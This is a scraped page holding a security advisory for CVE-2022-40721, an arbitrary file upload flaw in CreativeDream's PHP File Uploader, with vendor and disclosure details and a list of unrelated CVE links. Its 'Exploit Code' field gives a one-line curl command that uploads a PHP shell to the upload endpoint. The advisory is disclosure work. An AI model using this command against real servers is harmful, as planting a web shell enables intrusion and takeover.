CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Arbitrary file upload vulnerability in php uploader

Advisory #: 216

**Title:** CreativeDream software arbitrary file upload

**Author:** Larry W. Cashdollar

**Date:** 2022-09-08

**CVE-ID:**\[CVE-2022-40721\]

**CWE:**

**Download Site:** https://github.com/CreativeDream

**Vendor:** CreativeDream

**Vendor Notified:** 2020-02-19

**Vendor Contact:** yuliangagarin@mail.ru

**Advisory:** http://www.vapidlabs.com/advisory.php?v=216

**Description:** PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver.

**Vulnerability:**

The software allows executable file uploads to the web root directory.

**Export:** JSON TEXT XML

**Exploit Code:**

1.  curl \-vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
    

**Screen Shots:**

**Notes:**

Headline

CVE-2022-40721: Larry Cashdollar Vulnerability

CVE: Latest News